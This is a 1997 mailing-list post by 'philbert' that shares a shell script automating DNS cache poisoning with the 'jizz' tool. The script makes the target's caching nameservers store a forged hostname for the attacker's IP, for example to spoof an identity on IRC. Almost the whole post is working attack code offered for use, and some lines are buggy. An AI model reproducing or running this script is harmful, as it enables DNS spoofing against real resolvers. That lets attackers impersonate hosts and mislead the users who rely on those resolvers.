DNS "spoofing" simplified

philbert (philbert@DATATRAX.NET)
Wed, 03 Sep 1997 03:27:29 +0000

Alot of people ask about DNS spoofing and how common utilities like
"jizz" work. Jizz and the like are not generally easy utilities to use
even if you do have an authorative nameserver. The idea is not simple and
the instructions with such utils arn't very self explanatory. On top
of that, even if you understand it completelly with any of them you have
to either know what the target is using as a cacheing nameserver or
otherwise make a calculated guess. I wrote a script interface tonight to
the commonly available jizz binary to make it a: alot simpler to
understand and b: my script will automatically try to determine the
destinations nameserver and cache the domain on it, so that the only thing
required to enter after the nameserver info is set up is the IP of the
client, domain name you want to spoof, and destination server (IRC server
or what not). The script does the rest for you.

Please do not email me asking where to get jizz. If you don't have
it I'm not going to give it to you. Also the return email in the script
does not have an MX *yet* so if you want to reach me I can be found on
irc efnet as philbert.

here is the script:

--- begin jizz.sh ---

#!/bin/sh
#
# This script requires perl and the latest version of sh-utils for calculations,
# as well as other various standard unix utilities.
#
# This interface DOES NOT require you to know the cacheing nameserver of
# the destination server, it will attempt to calculate it for you.
#

case "${3}" in
"")
echo
echo "Intelligent DNS spoofer interface, by philbert."
echo "(philbert@DataTrax.Net)"
echo
echo "usage: $0 <your ip> <spoofed domain> <irc/misc server>"
echo "or: $0 <your ip> <spoofed domain> -ns <NS to cache fake domain>"
echo
exit 1
;;
esac

# ----------------------------------------------------------
# Set the configurations for your nameserver here

# The name of the nameserver this is running on:
NS=ns3.datatrax.net

# The IP address of the nameserver this is running on:
IP=1.2.3.4

# A domain that this nameserver is strictly authorative for:
AUTH=spoof.datatrax.net

# End of user configuration
# ----------------------------------------------------------

RAND=$RANDOM
export RAND

jizz $RAND.$AUTH. $NS $IP $AUTH $1 $2. >/dev/null &
sleep 1

if [ "$3" = "-ns" ]; then

echo "echo "trying to cache $2 on $4..."
nslookup -type=soa $RAND.$AUTH. $4 >/dev/null 2>&1

echo "$1 is cached on $2 as `nslookup $1 $2 | grep Name | cut -c10-`

exit 1
else false ; fi

NS=`host $3. | perl -n -e 's/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/print $1/e'`
if [ "NS" = "" ]; then NS=$3; else NS=$NS; fi

echo "trying to cache $2 on the server itself..."

nslookup -type=soa $RAND.$AUTH. $NS >/dev/null 2>&1

TEST=`nslookup $1 $3 | grep Name | cut -c10-`

if [ "$TEST" = "$2" ]; then
echo "Success!, $2 is cached on $3 as $1"
else echo "Failed..."; fi

RDEST=`nslookup $NS | grep Name | cut -c10-`
if [ "$RDEST" = "" ]; then RDEST=$3; else RDEST=$RDEST; fi

NS=`dnsquery $RDEST | grep "IN NS" | cut -f3- | cut -f2- -dS`
if [ "$NS" = "" ]; then
NS=`echo $RDEST | cut -f2- -d.`
NS=`dnsquery $NS | grep "IN NS" | cut -f3- | cut -f2- -dS`
else NS=$NS; fi

CRUNCH=1

while true ; do

TARGET=`echo $NS | cut -f$CRUNCH -d" "`

if [ "$TARGET" = "" ]; then
killall -9 jizz >/dev/null &
exit 1; else TARGET=$TARGET; fi

echo "trying to cache $2 on $TARGET..."
nslookup -type=soa $RAND.$AUTH. $TARGET >/dev/null 2>&1
TEST=`nslookup $1 $TARGET | grep Name | cut -c10-`

if [ "$TEST" = "$2" ]; then
echo "Success!, $2 is cached on $TARGET as $1"
else echo "Failed..."; fi

CRUNCH=`expr $CRUNCH + 1`

done

--- end jizz.sh ---